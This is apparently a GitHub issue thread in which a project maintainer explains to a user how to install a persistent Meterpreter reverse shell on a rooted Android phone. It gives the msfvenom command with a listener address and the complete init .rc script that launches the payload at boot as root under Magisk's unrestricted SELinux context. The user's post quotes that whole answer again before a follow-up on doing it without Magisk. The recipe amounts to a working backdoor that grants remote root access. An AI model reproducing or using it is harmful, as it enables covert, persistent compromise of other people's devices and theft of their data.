Question/Help

[gabriel-maxx]

Hi could you tell me something if I have a rooted android device then how do I:

msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 -f elf -o revshell

I copy the revshell binary to /system/bin/ and then I create a revshell.rc script and copy it to /system/etc/init/

but explain to me what the content of this rc script would look like? What do I have to put inside for it to work?

[LuigiVampa92]

Hi, thanks for your interest to the project.

The msfvenom is a cli tool to build shell binaries, so it should be executed not on the smartphone, but on your computer. It can be used on any linux OS, but it is already conveniently embedded into Kali. -p linux/armle/meterpreter/reverse_tcp is a type of payload - reverse shell, tcp, for Linux OS and ARM CPUs, -f elf is a file format - linux binary executable. So, when it ran it will connect to the LHOST host on LPORT port (you must control this host and have a listener waiting there for connection), and you will get a shell to the target device.

The idea is to build a "native" Android binary for ARM architecture CPU, put it alongside other system binaries on your smartphone (/system/bin/revshell), that are available system-wide, and then run it as a daemon when the OS loads. To run it as the daemon you have to make an init script (.rc script in case of Android, think of it as a systemd script in other Linux distributions). While you have to generate the binary for your own specific case, the content of the init script is very simple and it is always like this:

service revshell /system/bin/revshell
    disabled
    seclabel u:r:magisk:s0
    shutdown critical
 
on property:sys.boot_completed=1
    start revshell

So create file /system/etc/init/revshell.rc on your smartphone with the content above and it will automatically be executed by init process during system load. The stuff in this sctipt is:

service revshell /system/bin/revshell - pretty much self explainatory. It is a definition of your system service in format service SERVICE_NAME PATH_TO_SERVICE_BINARY.
disabled - is the marker that tells that service is disabled by default, but conditions of its start is simply described below (on property:sys.boot_completed). The idea is to not start the service until the system and other services are fully booted, just in case to make sure everythings be smooth, no missing mounts etc.
seclabel u:r:magisk:s0 - it is a definition of a SELinux context that needs to be set on your service process. That's the most critical part. The Magisk injects a special SELinux context for itself to run its own daemon (magiskd), and this context is "allmighty", it has absolutely zero restrictions in the system, technically magiskd spawns new processes with shells for you when you call su with this exact context. If you will not place that line here, the init process will refuse to start your service, as there is no prescribed transition rule to start revshell service from the init process context
shutdown critical - this line tell to consider this service critical for the system. It is not sctrictly necessary but adds some minor benefits, so why not?

Once both files are placed into the /system partition, you will have your daemon running and will be able to connect to your phone from your server and do anything you want there with root privileges.

The installer that is generated by the tool in this repo will generate a flashable zip file that can be installed via TWRP or other custom recovery projects that can provide you adb sideload mode. It will automatically create /system/etc/init/revshell.rc file for your with all the content and put it into the /system.

Hope it helps, sorry for a long answer

[gabriel-maxx]

Hi, thanks for your interest to the project.

The msfvenom is a cli tool to build shell binaries, so it should be executed not on the smartphone, but on your computer. It can be used on any linux OS, but it is already conveniently embedded into Kali. -p linux/armle/meterpreter/reverse_tcp is a type of payload - reverse shell, tcp, for Linux OS and ARM CPUs, -f elf is a file format - linux binary executable. So, when it ran it will connect to the LHOST host on LPORT port (you must control this host and have a listener waiting there for connection), and you will get a shell to the target device.

The idea is to build a "native" Android binary for ARM architecture CPU, put it alongside other system binaries on your smartphone (/system/bin/revshell), that are available system-wide, and then run it as a daemon when the OS loads. To run it as the daemon you have to make an init script (.rc script in case of Android, think of it as a systemd script in other Linux distributions). While you have to generate the binary for your own specific case, the content of the init script is very simple and it is always like this:

service revshell /system/bin/revshell
    disabled
    seclabel u:r:magisk:s0
    shutdown critical
 
on property:sys.boot_completed=1
    start revshell

So create file /system/etc/init/revshell.rc on your smartphone with the content above and it will automatically be executed by init process during system load. The stuff in this sctipt is:

service revshell /system/bin/revshell - pretty much self explainatory. It is a definition of your system service in format service SERVICE_NAME PATH_TO_SERVICE_BINARY. disabled - is the marker that tells that service is disabled by default, but conditions of its start is simply described below (on property:sys.boot_completed). The idea is to not start the service until the system and other services are fully booted, just in case to make sure everythings be smooth, no missing mounts etc. seclabel u:r:magisk:s0 - it is a definition of a SELinux context that needs to be set on your service process. That's the most critical part. The Magisk injects a special SELinux context for itself to run its own daemon (magiskd), and this context is "allmighty", it has absolutely zero restrictions in the system, technically magiskd spawns new processes with shells for you when you call su with this exact context. If you will not place that line here, the init process will refuse to start your service, as there is no prescribed transition rule to start revshell service from the init process context shutdown critical - this line tell to consider this service critical for the system. It is not sctrictly necessary but adds some minor benefits, so why not?

Once both files are placed into the /system partition, you will have your daemon running and will be able to connect to your phone from your server and do anything you want there with root privileges.

The installer that is generated by the tool in this repo will generate a flashable zip file that can be installed via TWRP or other custom recovery projects that can provide you adb sideload mode. It will automatically create /system/etc/init/revshell.rc file for your with all the content and put it into the /system.

Hope it helps, sorry for a long answer

Thanks for the explanation but my problem is that I've tried everything and I can't install magisk on my phone. I think my model is incompatible but I have root access and so I would like to know is it possible to do this without magisk, just with root access?

[LuigiVampa92]

Hm, perhaps I didn't understand you properly. So your problem is that you already have root but do not have magisk? Is that some multimedia device? Or an emulator?

Technically, you can install this binary and service script into your system, but you have to make sure that there are no working system integrity measures, like verified boot and dm-verity. If there are none, then just remount your partition or make a mount overlay to add new files to your system fs.

However, I must warn you, if there are some measures then you device might be bricked after you write new files to /system. Please be cautious. I cannot give you any advice, you have to understand risks and investigate that yourself